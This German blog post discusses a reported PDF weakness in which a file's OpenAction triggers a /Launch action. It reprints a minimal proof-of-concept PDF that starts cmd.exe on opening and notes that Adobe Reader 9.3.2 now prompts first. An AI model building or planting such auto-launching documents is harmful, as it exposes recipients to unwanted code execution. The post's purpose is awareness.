Sicherheitslücken in PDF

Das eine PDF-Datei mehr enthalten kann als nur Buchstaben und Bilder ist sicher einigen bekannt, als pdfTeXniker nutze ich gern Funktionen wie Javescript oder die Möglichkeiten zur Einbettung von Dateien im PDF Container. Vor ein paar Wochen hat Heise über eine Sicherheitslücke berichtet, die aus PDF Dateien andere ausführbare Dateien aufruft: http://www.heise.de/security/meldung/PDF-Exploit-funktioniert-ohne-konkrete-Sicherheitsluecke-968031.html. Im Forum zu diesem Artikel gab es das folgende Minimalbeispiel (in eine Datei packen und mit der Endung .PDF abspeichern):

%PDF-1.1

1 0 obj
<<
 /Pages 8 0 R
 /OpenAction 8 0 R
>>
endobj

8 0 obj
<<
 /S /Launch
 /Win
 <<
  /F (cmd.exe)
 >>
>>
endobj

trailer
<<
 /Root 1 0 R
>>

%%EOF

Meines Erachtens ist die Lücke gefixt, im Adobe Reader 9.3.2 kommt zumindest eine Nachfrage, ob man die Datei starten möchte.

Uwe

Uwe Ziegenhagen mag LaTeX und Python, auch gern in Kombination. Hat Dir dieser Beitrag geholfen und möchtest Du Dich dafür bedanken? Dann unterstütze doch vielleicht die Dingfabrik Köln e.V. mit einem kleinen Beitrag. Details zur Bezahlung findest Du unter Spenden für die Dingfabrik.

More Posts - Website